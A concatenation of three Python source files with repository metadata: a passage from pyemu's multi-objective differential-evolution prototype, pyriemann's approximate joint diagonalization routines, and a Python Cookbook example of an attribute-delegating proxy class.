dv_ensemble.loc[failed_runs, :] = np.NaN
dv_ensemble = dv_ensemble.dropna(axis=1)
obs_ensemble.loc[failed_runs, :] = np.NaN
obs_ensemble = obs_ensemble.dropna(axis=1)
self.logger.statement(
"dropped {0} failed runs, {1} remaining".format(
len(failed_runs), dv_ensemble.shape[0]
)
)
def _archive(self, dv_ensemble, obs_ensemble):
self.logger.log("archiving {0} solutions".format(dv_ensemble.shape[0]))
if dv_ensemble.shape[0] != obs_ensemble.shape[0]:
self.logger.lraise(
"EvolAlg._archive() error: shape mismatch: {0} : {1}".format(
dv_ensemble.shape[0], obs_ensemble.shape[0]
)
)
obs_ensemble = obs_ensemble.copy()
dv_ensemble = dv_ensemble.copy()
isfeas = self.obj_func.is_feasible(obs_ensemble)
isnondom = self.obj_func.is_nondominated(obs_ensemble)
cd = self.obj_func.crowd_distance(obs_ensemble)
obs_ensemble.loc[isfeas.index, "feasible"] = isfeas
obs_ensemble.loc[isnondom.index, "nondominated"] = isnondom
dv_ensemble.loc[isfeas.index, "feasible"] = isfeas
dv_ensemble.loc[isnondom.index, "nondominated"] = isnondom
obs_ensemble.loc[:, "iteration"] = self.iter_num
dv_ensemble.loc[:, "iteration"] = self.iter_num
obs_ensemble.loc[cd.index, "crowd_distance"] = cd
dv_ensemble.loc[cd.index, "crowd_distance"] = cd
if self.obs_ensemble_archive is None:
self.obs_ensemble_archive = obs_ensemble._df.loc[:, :]
self.dv_ensemble_archive = dv_ensemble._df.loc[:, :]
else:
self.obs_ensemble_archive = self.obs_ensemble_archive.append(
obs_ensemble._df.loc[:, :]
)
self.dv_ensemble_archive = self.dv_ensemble_archive.append(
dv_ensemble.loc[:, :]
)
def _calc_obs(self, dv_ensemble):
if self.par_ensemble is None:
failed_runs, oe = super(EvolAlg, self)._calc_obs(dv_ensemble)
else:
# make a copy of the org par ensemble but as a df instance
df_base = self.par_ensemble._df.loc[:, :]
# stack up the par ensembles for each solution
dfs = []
for i in range(dv_ensemble.shape[0]):
solution = dv_ensemble.iloc[i, :]
df = df_base.copy()
df.loc[:, solution.index] = solution.values
dfs.append(df)
df = pd.concat(dfs)
# reset with a range index
org_index = df.index.copy()
df.index = np.arange(df.shape[0])
failed_runs, oe = super(EvolAlg, self)._calc_obs(df)
if oe.shape[0] != dv_ensemble.shape[0] * self.par_ensemble.shape[0]:
self.logger.lraise("wrong number of runs back from stack eval")
EvolAlg._drop_failed(failed_runs, dv_ensemble, oe)
self.last_stack = oe.copy()
self.logger.log("reducing initial stack evaluation")
df = self.obj_func.reduce_stack_with_risk_shift(
oe, self.par_ensemble.shape[0], self.risk
)
self.logger.log("reducing initial stack evaluation")
# big assumption the run results are in the same order
df.index = dv_ensemble.index
oe = pyemu.ObservationEnsemble.from_dataframe(df=df, pst=self.pst)
self._archive(dv_ensemble, oe)
return oe
def update(self, *args, **kwargs):
self.logger.lraise("EvolAlg.update() must be implemented by derived types")
class EliteDiffEvol(EvolAlg):
def __init__(
self,
pst,
parcov=None,
obscov=None,
num_workers=0,
use_approx_prior=True,
submit_file=None,
verbose=False,
port=4004,
worker_dir="template",
):
super(EliteDiffEvol, self).__init__(
pst=pst,
parcov=parcov,
obscov=obscov,
num_workers=num_workers,
submit_file=submit_file,
verbose=verbose,
port=port,
worker_dir=worker_dir,
)
def update(self, mut_base=0.8, cross_over_base=0.7, num_dv_reals=None):
if not self._initialized:
self.logger.lraise("not initialized")
if num_dv_reals is None:
num_dv_reals = self.num_dv_reals
if self.dv_ensemble.shape[0] < 4:
self.logger.lraise("not enough individuals in population to continue")
# function to get unique index names
self._child_count = 0
def next_name():
while True:
sol_name = "c_i{0}_{1}".format(self.iter_num, self._child_count)
if sol_name not in self.dv_ensemble.index.values:
break
self._child_count += 1
return sol_name
# generate self.num_dv_reals offspring using diff evol rules
dv_offspring = []
child2parent = {}
offspring_idx = []
tol = 1.0
num_dv = self.dv_ensemble.shape[1]
dv_names = self.dv_ensemble.columns
dv_log = self.pst.parameter_data.loc[dv_names, "partrans"] == "log"
lb = self.pst.parameter_data.loc[dv_names, "parlbnd"].copy()
ub = self.pst.parameter_data.loc[dv_names, "parubnd"].copy()
lb.loc[dv_log] = lb.loc[dv_log].apply(np.log10)
ub.loc[dv_log] = ub.loc[dv_log].apply(np.log10)
dv_ensemble_trans = self.dv_ensemble.copy()
for idx in dv_ensemble_trans.index:
dv_ensemble_trans.loc[idx, dv_log] = dv_ensemble_trans.loc[
idx, dv_log
].apply(lambda x: np.log10(x))
for i in range(num_dv_reals):
# every parent gets an offspring
if i < self.dv_ensemble.shape[0]:
parent_idx = i
mut = mut_base
cross_over = cross_over_base
else:
# otherwise, some parents get more than one offspring
# could do something better here - like pick a good parent
# make a wild child
parent_idx = np.random.randint(0, dv_ensemble_trans.shape[0])
mut = 0.9
cross_over = 0.9
parent = dv_ensemble_trans.iloc[parent_idx, :]
# select the three other members in the population
abc_idxs = np.random.choice(dv_ensemble_trans.index, 3, replace=False)
abc = dv_ensemble_trans.loc[abc_idxs, :].copy()
mutant = abc.iloc[0] + (mut * (abc.iloc[1] - abc.iloc[2]))
# select cross over genes (dec var values)
cross_points = np.random.rand(num_dv) < cross_over
if not np.any(cross_points):
cross_points[np.random.randint(0, num_dv)] = True
# create an offspring
offspring = parent._df.copy()
offspring.loc[cross_points] = mutant.loc[cross_points]
# enforce bounds
out = offspring > ub
offspring.loc[out] = ub.loc[out]
out = offspring < lb
offspring.loc[out] = lb.loc[out]
# back transform
offspring.loc[dv_log] = 10.0 ** offspring.loc[dv_log]
offspring = offspring.loc[self.dv_ensemble.columns]
sol_name = "c_{0}".format(i)
dv_offspring.append(offspring)
offspring_idx.append(sol_name)
child2parent[sol_name] = dv_ensemble_trans.index[parent_idx]
dv_offspring = pd.DataFrame(
dv_offspring, columns=self.dv_ensemble.columns, index=offspring_idx
)
# run the model with offspring candidates
self.logger.log(
"running {0} canditiate solutions for iteration {1}".format(
dv_offspring.shape[0], self.iter_num
)
)
obs_offspring = self._calc_obs(dv_offspring)
# evaluate offspring fitness WRT feasibility and nondomination (elitist) -
# if offspring dominates parent, replace in
# self.dv_ensemble and self.obs_ensemble. if not, drop candidate.
# If tied, keep both
isfeas = self.obj_func.is_feasible(obs_offspring)
isnondom = self.obj_func.is_nondominated(obs_offspring)
for child_idx in obs_offspring.index:
if not isfeas[child_idx]:
self.logger.statement("child {0} is not feasible".format(child_idx))
continue
child_sol = obs_offspring.loc[child_idx, :]
parent_idx = child2parent[child_idx]
if parent_idx is None:
# the parent was already removed by another child, so if this child is
# feasible and nondominated, keep it
if isnondom(child_idx):
self.logger.statement(
"orphaned child {0} retained".format(child_idx)
)
sol_name = next_name()
self.dv_ensemble.loc[sol_name, child_sol.index] = child_sol
self.obs_ensemble.loc[
sol_name, obs_offspring.columns
] = obs_offspring.loc[child_idx, :]
else:
parent_sol = self.obs_ensemble.loc[parent_idx, :]
if self.obj_func.dominates(
parent_sol.loc[self.obj_func.obs_obj_names],
child_sol.loc[self.obj_func.obs_obj_names],
):
self.logger.statement(
"child {0} dominated by parent {1}".format(
child_idx, parent_idx
)
)
# your dead to me!
pass
elif self.obj_func.dominates(
child_sol.loc[self.obj_func.obs_obj_names],
parent_sol.loc[self.obj_func.obs_obj_names],
):
# hey dad, what do you think about your son now!
self.logger.statement(
"child {0} dominates parent {1}".format(child_idx, parent_idx)
)
self.dv_ensemble.loc[
parent_idx, dv_offspring.columns
] = dv_offspring.loc[child_idx, :]
self.obs_ensemble._df.loc[
parent_idx, obs_offspring.columns
] = obs_offspring._df.loc[child_idx, :]
child2parent[idx] = None
else:
self.logger.statement(
"child {0} and parent {1} kept".format(child_idx, parent_idx)
)
sol_name = next_name()
self.dv_ensemble.loc[
sol_name, dv_offspring.columns
] = dv_offspring.loc[child_idx, :]
self.obs_ensemble._df.loc[
sol_name, obs_offspring.columns
] = obs_offspring._df.loc[child_idx, :]
# if there are too many individuals in self.dv_ensemble,
# first drop dominated,then reduce by using crowding distance.
# self.logger.statement("number of solutions:{0}".format(self.dv_ensemble.shape[0]))
isnondom = self.obj_func.is_nondominated(self.obs_ensemble)
dom_idx = isnondom.loc[isnondom == False].index
nondom_idx = isnondom.loc[isnondom == True].index
self.logger.statement(
"number of dominated solutions:{0}".format(dom_idx.shape[0])
)
# self.logger.statement("nondominated solutions: {0}".format(','.join(nondom_idx)))
self.logger.statement("dominated solutions: {0}".format(",".join(str(dom_idx))))
ndrop = self.dv_ensemble.shape[0] - num_dv_reals
if ndrop > 0:
isnondom = self.obj_func.is_nondominated(self.obs_ensemble)
vc = isnondom.value_counts()
# if there a dominated solutions, drop those first, using
# crowding distance as the order
if False in vc.index:
# get dfs for the dominated solutions
dv_dom = self.dv_ensemble.loc[dom_idx, :].copy()
obs_dom = self.obs_ensemble.loc[dom_idx, :].copy()
self.dv_ensemble.drop(dom_idx, inplace=True)
self.obs_ensemble.drop(dom_idx, inplace=True)
self.logger.statement(
"dropping {0} dominated individuals based on crowd distance".format(
min(ndrop, dv_dom.shape[0])
)
)
self._drop_by_crowd(dv_dom, obs_dom, min(ndrop, dv_dom.shape[0]))
# add any remaining dominated solutions back
self.dv_ensemble = self.dv_ensemble.append(dv_dom._df)
self.obs_ensemble = self.obs_ensemble.append(obs_dom._df)
# drop remaining nondom solutions as needed
if self.dv_ensemble.shape[0] > num_dv_reals:
self._drop_by_crowd(
self.dv_ensemble,
self.obs_ensemble,
self.dv_ensemble.shape[0] - num_dv_reals,
)
self.iter_report()
self.iter_num += 1
return
def iter_report(self):
oe = self.obs_ensemble.copy()
dv = self.dv_ensemble.copy()
isfeas = self.obj_func.is_feasible(oe)
isnondom = self.obj_func.is_nondominated(oe)
cd = self.obj_func.crowd_distance(oe)
for df in [oe, dv]:
df.loc[isfeas.index, "feasible"] = isfeas
df.loc[isnondom.index, "nondominated"] = isnondom
df.loc[cd.index, "crowd_distance"] = cd
dv.to_csv("dv_ensemble.{0}.csv".format(self.iter_num + 1))
oe.to_csv("obs_ensemble.{0}.csv".format(self.iter_num + 1))
self.logger.statement("*** iteration {0} report".format(self.iter_num + 1))
self.logger.statement("{0} current solutions".format(dv.shape[0]))
self.logger.statement("{0} infeasible".format(isfeas[isfeas == False].shape[0]))
self.logger.statement(
"{0} nondomiated".format(isnondom[isnondom == True].shape[0])
)
def _drop_by_crowd(self, dv_ensemble, obs_ensemble, ndrop, min_dist=0.1):
if ndrop > dv_ensemble.shape[0]:
self.logger.lraise(
"EliteDiffEvol.drop_by_crowd() error: ndrop"
+ "{0} > dv_ensemble.shape[0] {1}".format(ndrop, dv_ensemble.shape[0])
)
self.logger.statement(
"dropping {0} of {1} individuals based on crowd distance".format(
ndrop, dv_ensemble.shape[0]
)
)
# if min_dist is not None:
# while True:
# cd = self.obj_func.crowd_distance(obs_ensemble)
# if cd.min() >= min_dist or ndrop == 0:
# break
# cd.sort_values(inplace=True, ascending=False)
#
# drop_idx = cd.index[-1]
# self.logger.statement("dropping solution {0} - less then 'min_dist' apart{1}".\
# format(drop_idx,cd.loc[drop_idx]))
#
# dv_ensemble.drop(drop_idx,inplace=True)
# obs_ensemble.drop(drop_idx,inplace=True)
# ndrop -= 1%
for idrop in range(ndrop):
cd = self.obj_func.crowd_distance(obs_ensemble)
cd.sort_values(inplace=True, ascending=False)
# drop the first element in cd from both dv_ensemble and obs_ensemble
drop_idx = cd.index[-1]
self.logger.statement(
"solution {0} removed based on crowding distance {1}".format(
drop_idx, cd[drop_idx]
)
)
dv_ensemble.drop(drop_idx, inplace=True)
obs_ensemble.drop(drop_idx, inplace=True)
| {
"repo_name": "jtwhite79/pyemu",
"path": "pyemu/prototypes/moouu.py",
"copies": "1",
"size": "36825",
"license": "bsd-3-clause",
"hash": 6117156897981551000,
"line_mean": 37.2796257796,
"line_max": 112,
"alpha_frac": 0.5164154786,
"autogenerated": false,
"ratio": 3.8347391440174947,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9847776625845043,
"avg_score": 0.0006755993544905156,
"num_lines": 962
} |
"""Aproximate joint diagonalization algorithm."""
import numpy as np
def rjd(X, eps=1e-8, n_iter_max=1000):
"""Approximate joint diagonalization based on jacobi angle.
This is a direct implementation of the Cardoso AJD algorithm [1] used in
JADE. The code is a translation of the matlab code provided in the author
website.
Parameters
----------
X : ndarray, shape (n_trials, n_channels, n_channels)
A set of covariance matrices to diagonalize
eps : float (default 1e-8)
Tolerance for stopping criterion.
n_iter_max : int (default 1000)
The maximum number of iteration to reach convergence.
Returns
-------
V : ndarray, shape (n_channels, n_channels)
the diagonalizer
D : ndarray, shape (n_trials, n_channels, n_channels)
the set of quasi diagonal matrices
Notes
-----
.. versionadded:: 0.2.4
See Also
--------
ajd_pham
uwedge
References
----------
[1] Cardoso, Jean-Francois, and Antoine Souloumiac. Jacobi angles for
simultaneous diagonalization. SIAM journal on matrix analysis and
applications 17.1 (1996): 161-164.
"""
# reshape input matrix
A = np.concatenate(X, 0).T
# init variables
m, nm = A.shape
V = np.eye(m)
encore = True
k = 0
while encore:
encore = False
k += 1
if k > n_iter_max:
break
for p in range(m - 1):
for q in range(p + 1, m):
Ip = np.arange(p, nm, m)
Iq = np.arange(q, nm, m)
# computation of Givens angle
g = np.array([A[p, Ip] - A[q, Iq], A[p, Iq] + A[q, Ip]])
gg = np.dot(g, g.T)
ton = gg[0, 0] - gg[1, 1]
toff = gg[0, 1] + gg[1, 0]
theta = 0.5 * np.arctan2(toff, ton +
np.sqrt(ton * ton + toff * toff))
c = np.cos(theta)
s = np.sin(theta)
encore = encore | (np.abs(s) > eps)
if (np.abs(s) > eps):
tmp = A[:, Ip].copy()
A[:, Ip] = c * A[:, Ip] + s * A[:, Iq]
A[:, Iq] = c * A[:, Iq] - s * tmp
tmp = A[p, :].copy()
A[p, :] = c * A[p, :] + s * A[q, :]
A[q, :] = c * A[q, :] - s * tmp
tmp = V[:, p].copy()
V[:, p] = c * V[:, p] + s * V[:, q]
V[:, q] = c * V[:, q] - s * tmp
D = np.reshape(A, (m, nm/m, m)).transpose(1, 0, 2)
return V, D
def ajd_pham(X, eps=1e-6, n_iter_max=15):
"""Approximate joint diagonalization based on pham's algorithm.
This is a direct implementation of the PHAM's AJD algorithm [1].
Parameters
----------
X : ndarray, shape (n_trials, n_channels, n_channels)
A set of covariance matrices to diagonalize
eps : float (default 1e-6)
tolerance for stoping criterion.
n_iter_max : int (default 1000)
The maximum number of iteration to reach convergence.
Returns
-------
V : ndarray, shape (n_channels, n_channels)
the diagonalizer
D : ndarray, shape (n_trials, n_channels, n_channels)
the set of quasi diagonal matrices
Notes
-----
.. versionadded:: 0.2.4
See Also
--------
rjd
uwedge
References
----------
[1] Pham, Dinh Tuan. "Joint approximate diagonalization of positive
definite Hermitian matrices." SIAM Journal on Matrix Analysis and
Applications 22, no. 4 (2001): 1136-1152.
"""
nmat = X.shape[0]
# reshape input matrix
A = np.concatenate(X, 0).T
# init variables
m, nm = A.shape
V = np.eye(m)
epsi = m * (m - 1) * eps
for it in range(n_iter_max):
decr = 0
for i in range(1, m):
for j in range(i):
Ii = np.arange(i, nm, m)
Ij = np.arange(j, nm, m)
c1 = A[i, Ii]
c2 = A[j, Ij]
g12 = np.mean(A[i, Ij] / c1)
g21 = np.mean(A[i, Ij] / c2)
omega21 = np.mean(c1 / c2)
omega12 = np.mean(c2 / c1)
omega = np.sqrt(omega12*omega21)
tmp = np.sqrt(omega21/omega12)
tmp1 = (tmp*g12 + g21)/(omega + 1)
tmp2 = (tmp*g12 - g21)/np.max(omega - 1, 1e-9)
h12 = tmp1 + tmp2
h21 = np.conj((tmp1 - tmp2)/tmp)
decr = decr + nmat*(g12 * np.conj(h12) + g21 * h21) / 2.0
tmp = 1 + 1.j * 0.5 * np.imag(h12 * h21)
tmp = np.real(tmp + np.sqrt(tmp ** 2 - h12 * h21))
T = np.array([[1, -h12/tmp], [-h21/tmp, 1]])
A[[i, j], :] = np.dot(T, A[[i, j], :])
tmp = np.c_[A[:, Ii], A[:, Ij]]
tmp = np.dot(np.reshape(tmp, (m * nmat, 2), order='F'), T.T)
tmp = np.reshape(tmp, (m, nmat * 2), order='F')
A[:, Ii] = tmp[:, :nmat]
A[:, Ij] = tmp[:, nmat:]
V[[i, j], :] = np.dot(T, V[[i, j], :])
if decr < epsi:
break
D = np.reshape(A, (m, nm/m, m)).transpose(1, 0, 2)
return V, D
import scipy as sp
def uwedge(X, init=None, eps=1e-7, n_iter_max=100):
"""Approximate joint diagonalization algorithm UWEDGE.
Uniformly Weighted Exhaustive Diagonalization using Gauss iteration
(U-WEDGE). Implementation of the AJD algorithm by Tichavsky and Yeredor.
This is a translation from the matlab code provided by the authors.
Parameters
----------
X : ndarray, shape (n_trials, n_channels, n_channels)
A set of covariance matrices to diagonalize
init: None | ndarray, shape (n_channels, n_channels) (default None)
Initialization for the diagonalizer.
eps : float (default 1e-7)
tolerance for stoping criterion.
n_iter_max : int (default 1000)
The maximum number of iteration to reach convergence.
Returns
-------
V : ndarray, shape (n_channels, n_channels)
the diagonalizer
D : ndarray, shape (n_trials, n_channels, n_channels)
the set of quasi diagonal matrices
Notes
-----
.. versionadded:: 0.2.4
See Also
--------
rjd
ajd_pham
References
----------
[1] P. Tichavsky, A. Yeredor and J. Nielsen,
"A Fast Approximate Joint Diagonalization Algorithm
Using a Criterion with a Block Diagonal Weight Matrix",
ICASSP 2008, Las Vegas
[2] P. Tichavsky and A. Yeredor, "Fast Approximate Joint Diagonalization
Incorporating Weight Matrices" IEEE Transactions of Signal Processing,
2009.
"""
L, d, _ = X.shape
# reshape input matrix
M = np.concatenate(X, 0).T
# init variables
d, Md = M.shape
iteration = 0
improve = 10
if init is None:
E, H = sp.linalg.eig(M[:, 0:d])
W_est = np.dot(np.diag(1. / np.sqrt(np.abs(E))), H.T)
else:
W_est = init
Ms = np.array(M)
Rs = np.zeros((d, L))
for k in range(L):
ini = k*d
Il = np.arange(ini, ini + d)
M[:, Il] = 0.5*(M[:, Il] + M[:, Il].T)
Ms[:, Il] = np.dot(np.dot(W_est, M[:, Il]), W_est.T)
Rs[:, k] = np.diag(Ms[:, Il])
crit = np.sum(Ms**2) - np.sum(Rs**2)
while (improve > eps) & (iteration < n_iter_max):
B = np.dot(Rs, Rs.T)
C1 = np.zeros((d, d))
for i in range(d):
C1[:, i] = np.sum(Ms[:, i:Md:d]*Rs, axis=1)
D0 = B*B.T - np.outer(np.diag(B), np.diag(B))
A0 = (C1 * B - np.dot(np.diag(np.diag(B)), C1.T)) / (D0 + np.eye(d))
A0 += np.eye(d)
W_est = sp.linalg.solve(A0, W_est)
Raux = np.dot(np.dot(W_est, M[:, 0:d]), W_est.T)
aux = 1./np.sqrt(np.abs(np.diag(Raux)))
W_est = np.dot(np.diag(aux), W_est)
for k in range(L):
ini = k*d
Il = np.arange(ini, ini + d)
Ms[:, Il] = np.dot(np.dot(W_est, M[:, Il]), W_est.T)
Rs[:, k] = np.diag(Ms[:, Il])
crit_new = np.sum(Ms**2) - np.sum(Rs**2)
improve = np.abs(crit_new - crit)
crit = crit_new
iteration += 1
D = np.reshape(Ms, (d, L, d)).transpose(1, 0, 2)
return W_est, D
| {
"repo_name": "alexandrebarachant/decoding-brain-challenge-2016",
"path": "models/pyriemann/utils/ajd.py",
"copies": "1",
"size": "8379",
"license": "bsd-3-clause",
"hash": -7548331173395832000,
"line_mean": 28.5035211268,
"line_max": 78,
"alpha_frac": 0.4985081752,
"autogenerated": false,
"ratio": 3.128827483196415,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4127335658396415,
"avg_score": null,
"num_lines": null
} |
# A proxy class that wraps around another object, but
# exposes its public attributes
class Proxy:
def __init__(self, obj):
self._obj = obj
# Delegate attribute lookup to internal obj
def __getattr__(self, name):
print('getattr:', name)
return getattr(self._obj, name)
# Delegate attribute assignment
def __setattr__(self, name, value):
if name.startswith('_'):
super().__setattr__(name, value)
else:
print('setattr:', name, value)
setattr(self._obj, name, value)
# Delegate attribute deletion
def __delattr__(self, name):
if name.startswith('_'):
super().__delattr__(name)
else:
print('delattr:', name)
delattr(self._obj, name)
if __name__ == '__main__':
class Spam:
def __init__(self, x):
self.x = x
def bar(self, y):
print('Spam.bar:', self.x, y)
# Create an instance
s = Spam(2)
# Create a proxy around it
p = Proxy(s)
# Access the proxy
print(p.x) # Outputs 2
p.bar(3) # Outputs "Spam.bar: 2 3"
p.x = 37 # Changes s.x to 37
| {
"repo_name": "tuanavu/python-cookbook-3rd",
"path": "src/8/delegation_and_proxies/example2.py",
"copies": "2",
"size": "1185",
"license": "mit",
"hash": -3156999075640508400,
"line_mean": 25.3333333333,
"line_max": 53,
"alpha_frac": 0.5282700422,
"autogenerated": false,
"ratio": 3.898026315789474,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0016777461221905666,
"num_lines": 45
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.